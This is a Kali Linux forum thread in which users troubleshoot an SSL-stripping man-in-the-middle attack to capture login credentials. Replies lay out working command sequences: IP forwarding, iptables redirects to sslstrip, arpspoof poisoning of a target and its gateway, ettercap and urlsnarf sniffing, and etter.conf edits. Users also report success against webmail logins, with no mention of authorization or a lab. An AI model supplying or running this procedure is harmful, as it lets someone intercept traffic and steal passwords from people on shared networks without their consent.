Results 1 to 20 of 20

Thread: SSLStrip by ettercap

  1. #1
    Join Date
    2013-Jul
    Posts
    44

    SSLStrip by ettercap

    Hi all,

    Trying to run sslstrip by ettercap as follows to capture the creds on Kali:

    # echo 1 > /proc/sys/net/ipv4/ip_forward
    # iptables -t nat -A PREROUTING -i eth0 -p tcp --d-port 80 -j REDIRECT --to-port 10000
    # arpspoof -i eth0 -t 192.168.1.200 192.168.1.1
    # ettercap -T -i eth0
    # sslstrip -a


    but ettercap while running gives alert: "SSL dissection needs a valid 'redir_command_on' script in the etter.conf file" and no creds captures.
    Should I modify something in "ettercap.conf" file?..or anything wrong or missing with my configuration and procedure?

    Thanks a lot,

  2. #2
    Join Date
    2013-Aug
    Posts
    12
    Quote Originally Posted by xerxes View Post
    Hi all,

    Trying to run sslstrip by ettercap as follows to capture the creds on Kali:

    # echo 1 > /proc/sys/net/ipv4/ip_forward
    # iptables -t nat -A PREROUTING -i eth0 -p tcp --d-port 80 -j REDIRECT --to-port 10000
    # arpspoof -i eth0 -t 192.168.1.200 192.168.1.1
    # ettercap -T -i eth0
    # sslstrip -a


    but ettercap while running gives alert: "SSL dissection needs a valid 'redir_command_on' script in the etter.conf file" and no creds captures.
    Should I modify something in "ettercap.conf" file?..or anything wrong or missing with my configuration and procedure?

    Thanks a lot,

    Hi, Type:

    gedit /etc/etter.conf&

    Delete:
    # if you use iptables:
    # redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    Insert:
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

  3. #3
    Join Date
    2013-Jul
    Posts
    44
    Ok I added these two lines to ettercap.conf but still no creds. captures, though there's not any error while running.

    redir_command_on = "iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000"
    redir_command_off = "iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000"

    Any help please?

  4. #4
    Join Date
    2013-Aug
    Posts
    25
    use my script Hard track ... all problems ll be fixed ..

  5. #5
    Join Date
    2013-Jul
    Posts
    44
    Quote Originally Posted by lawrencethepentester View Post
    use my script Hard track ... all problems ll be fixed ..
    Ok, I installed the script and run, but the same problem exists.Kali does redirect traffic to destination but ettercap captures no credentials.
    I should say that I tested the https (Yahoo mail and Gmail) not http.Does it matter?

    Rgds,
    Last edited by xerxes; 2013-09-02 at 19:56.

  6. #6
    Join Date
    2013-Mar
    Posts
    71
    this is what I do because I have problems with the arp spoofing with ettercap, I just use ettercap for credentials

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    sslstrip -k -l 8080 #to listen for traffic going through your redirected port, 8080

    I then move that terminal and open a new one and use

    arpspoof -i wlan0 -t 192.168.1.20 192.168.1.1 (FIRST ONE IS TARGET, SECOND IS GATEWAY)

    and leave that open

    afterwards you can run use urlsnarf -i wlan0 to sniff urls

    for credentials, I open another window and use

    ettercap -T -q -i wlan0 #to sniff for passwords ONLY.

    I've been using this method and have had 0 problems and it's effective.

  7. #7
    Join Date
    2013-Mar
    Posts
    71
    it could also be your sslstrip command

    maybe try
    sslstrip -k -l 10000 #since you're redirecting to go through port 10,000
    but I recommend my way, seeing how I have no problems with it.
    plus you have multiple terminals open and you can see how everything is running, for example
    you can see the actual arpspoofing to make sure it's working and you can view the ettercap passwords in the other terminal. Just follow exactly what I said in that order and you should have no problems

  8. #8
    Join Date
    2013-Jul
    Posts
    44
    And haven't you done any changes to these two lines in ettercap.conf?

    redir_command_on = "iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000"
    redir_command_off = "iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000"

  9. #9
    Join Date
    2013-Mar
    Posts
    71
    I haven't changed anything. But I also only use ettercap to get passwords which is made by dsniff

  10. #10
    Join Date
    2013-Jul
    Posts
    44
    So I should use dsniff too, would you please tell me proper switches for dsniff for this issue?...Thanks

  11. #11
    Join Date
    2013-Mar
    Posts
    10
    the lines should stay the same
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    you just have to uncomment them by removing the "#" at the beggining

  12. #12
    Join Date
    2013-Jul
    Posts
    44
    Quote Originally Posted by jnpa View Post
    the lines should stay the same
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    you just have to uncomment them by removing the "#" at the beggining
    Without specifying port number and other variables?...for example,You mean %iface must not be replaced by eth0 or wlan0?

  13. #13
    Join Date
    2013-Mar
    Posts
    71
    To answer your question about dsniff, you don't need to do anything special. If you want to do it my way, just one all the commands I listed in that order In a terminal.

  14. #14
    Join Date
    2013-Mar
    Posts
    71
    Quote Originally Posted by xerxes View Post
    Without specifying port number and other variables?...for example,You mean %iface must not be replaced by eth0 or wlan0?
    and for this, you do not add your interface or anything. Literally just remove the Comments from it (#) and that's it.

  15. #15
    Join Date
    2013-Apr
    Location
    Norway
    Posts
    16
    When everything fails, try Subterfuge

    http://code.google.com/p/subterfuge/
    I would love to change the world, but they will not give me the source code!

  16. #16
    Join Date
    2013-Jul
    Posts
    44
    I observe two strange issues while working on this :

    1- When running ettercap, "ip_forward" returns back to 0 inspite of "echo 1 > /proc/sys/net/ipv4/ip_forward" I did before, I should run this command again after running ettercap.

    2- Should I see any extra rule in iptables rules after running this "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000"?
    There's no change in iptables after and before running this command.

  17. #17
    Join Date
    2013-Mar
    Posts
    10
    1 - no you don't need to run the command again
    2 - yes, you should see an entry in iptables, just remember you have to list nat iptables, so "iptables -L -t nat"

  18. #18
    Join Date
    2013-Mar
    Posts
    38
    paraponera framework, subterfuge, easy creds, all those tools will automate this process for you.

    If you still you want to try it manually, I would also suggest scrapping ettercap for the MiTM, arpspoof is much better at it.

    Ettercap tends to DoS more than MiTM and pass through, however its still great for sniffing and getting the creds.

  19. #19
    Join Date
    2013-Jul
    Posts
    44
    Thanks guys . Now it works fine with IE, but not with FireFox.After accepting the certificate warning , it shows nothing but the "The connection was reset" page by FireFox.
    Any clue?

  20. #20
    Join Date
    2017-Jun
    Posts
    2
    it may be possible that the port 8080 isn't accepting the traffic. You can make it accept by using the following command:
    iptables -I INPUT -p tcp --dport 8080 -j ACCEPT.

    After this, check if the port is accepting the traffic by using the following command:
    iptables -L INPUT

Similar Threads

  1. Fake access point + ettercap + sslstrip
    By anashlali in forum How-To Archive
    Replies: 50
    Last Post: 2016-04-29, 16:54
  2. Error when running Ettercap -G and sslstrip together
    By kalinoob1 in forum General Archive
    Replies: 9
    Last Post: 2014-10-01, 10:54
  3. Replies: 0
    Last Post: 2014-09-04, 23:41

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •